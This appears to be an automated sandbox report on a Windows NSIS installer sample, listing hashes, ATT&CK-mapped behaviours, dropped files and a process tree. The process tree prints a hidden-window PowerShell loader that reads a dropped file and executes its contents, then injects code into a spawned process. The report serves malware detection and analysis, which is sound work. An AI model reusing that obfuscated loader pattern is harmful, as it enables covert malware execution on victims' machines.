Overview
overview
8Static
static
306c18aecf5...58.exe
windows7-x64
806c18aecf5...58.exe
windows10-2004-x64
8$PLUGINSDI...ge.dll
windows7-x64
3$PLUGINSDI...ge.dll
windows10-2004-x64
3$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
146s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04/09/2024, 10:40
Static task
static1
Behavioral task
behavioral1
Sample
06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
General
-
Target
06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe
-
Size
574KB
-
MD5
74e43edd90b7a3f378ac43173eafb6c6
-
SHA1
769049685165f71c710781df1bc20dc9feb5d354
-
SHA256
06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458
-
SHA512
a9d5c79c0cfc4d69a0427c425cb54d6bcf9e7048a830a1762d2881e63112adc46d0900ebcd746fa956e8eef1deaebd755fab1d6d3488ccd7827c5c6a8460b95e
-
SSDEEP
12288:sCn4AyHnOS7RiYK5a4JZiSbRN/zVTBSJqtjWWJ0wE:/nEnp7gXvJZiQ7HSJqtjBJ0
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2980 powershell.exe -
Loads dropped DLL 5 IoCs
pid Process 468 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe 468 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe 468 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe 468 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe 4784 ooidal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2980 powershell.exe 4784 ooidal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2980 set thread context of 4784 2980 powershell.exe 95 -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\astonied.ini 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Fonts\frasiger.ini 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe File created C:\Windows\resources\sammentrkket\fatherlike.lnk 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ooidal.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x0004000000022ab1-67.dat nsis_installer_1 behavioral2/files/0x0004000000022ab1-67.dat nsis_installer_2 -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2980 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 468 wrote to memory of 2980 468 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe 85 PID 468 wrote to memory of 2980 468 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe 85 PID 468 wrote to memory of 2980 468 06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe 85 PID 2980 wrote to memory of 4784 2980 powershell.exe 95 PID 2980 wrote to memory of 4784 2980 powershell.exe 95 PID 2980 wrote to memory of 4784 2980 powershell.exe 95 PID 2980 wrote to memory of 4784 2980 powershell.exe 95 PID 2980 wrote to memory of 4784 2980 powershell.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe"C:\Users\Admin\AppData\Local\Temp\06c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Overbrowsed=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Skoleeksempler.Mar';$Sammenstikkende=$Overbrowsed.SubString(70157,3);.$Sammenstikkende($Overbrowsed)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\ooidal.exe"C:\Users\Admin\AppData\Local\Temp\ooidal.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4784
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD549998d066af103d06b56f5b4c76b1497
SHA1b7dce166147f40dfa17f5ca950c4e324a10d04be
SHA25695042dbe7428461ee7fd210acf37040eb921012c7b32f66cb54766f0a16bb5b6
SHA51261b0d75ef3a18c8c13ad8c614a012a71cbc4f6fd4bba0aa0c7b866e1a8fbf5f9fdb3e012a3566586d47fc8b456a7de36a06a0d70cdf27e504aac64eab37555d7
-
Filesize
9KB
MD519d3373e403a6e724cfa1563dfd1f463
SHA14917547b355a91e9431879209f56925097bf4fb3
SHA256873fa0c52eae7cfbed56ea18b21fad0ca8f018ab7f305bd1db1a3ec454e353d1
SHA512b6f6db23376ade4bb864ea14244980612f42f322d3915540090bfe8edc80e9577b7aec3589bd587ca47a729371ed8ab8e6e23031bb3e3f524d48783637646193
-
Filesize
6KB
MD56c881f00ba860b17821d8813aa34dbc6
SHA10e5a1e09b1ce1bc758d6977b913a8d9ccbe52a13
SHA256bcb93204bd1854d0c34fa30883bab51f6813ab32abf7fb7d4aeed21d71f6af87
SHA512c78d6f43aa9bb35260a7bd300392ce809282660283fa6cb3059bae50d6db229b0b853cab7c949d4bdf19309fb183257b1c9feb01a66347e1c0adeb21543315b6
-
Filesize
574KB
MD574e43edd90b7a3f378ac43173eafb6c6
SHA1769049685165f71c710781df1bc20dc9feb5d354
SHA25606c18aecf56c55274b1437ad4530bfbd15f7063f300cab6c25f2a123748f6458
SHA512a9d5c79c0cfc4d69a0427c425cb54d6bcf9e7048a830a1762d2881e63112adc46d0900ebcd746fa956e8eef1deaebd755fab1d6d3488ccd7827c5c6a8460b95e
-
Filesize
313KB
MD5c112edef537540c9ea832a3510dad69c
SHA193f6203104bbda2dce66e9f49b00ece85ede8e28
SHA2566a6093e526834d0f1b4daec23f80a0d4929f6cab42bd002c3d84edead57d4348
SHA51256c9166d6a4ffc35ca12c332b07b2964918868d9657bc3da0b5986db768952c4cca9a045a4effc004857adde5058002a06b27b613a2cc05801261cda7b166c81
-
Filesize
68KB
MD5e3649d4b640393f40a763a43483d8e7b
SHA18efe00ce5e12c04cfe93956d12118ffab6f30875
SHA25655f609396514d8de750ed3c7225f5db00b7940f82970cbb0c62389b63e2d91e3
SHA51233bd5151dbb95248f71600948d80772cef11737c69aa01a8fb7c07922d6b55f08c9c26be5f1a3dae79c635a349c0e632a4bb76d1b4cd68a3f4fffecb3d630d11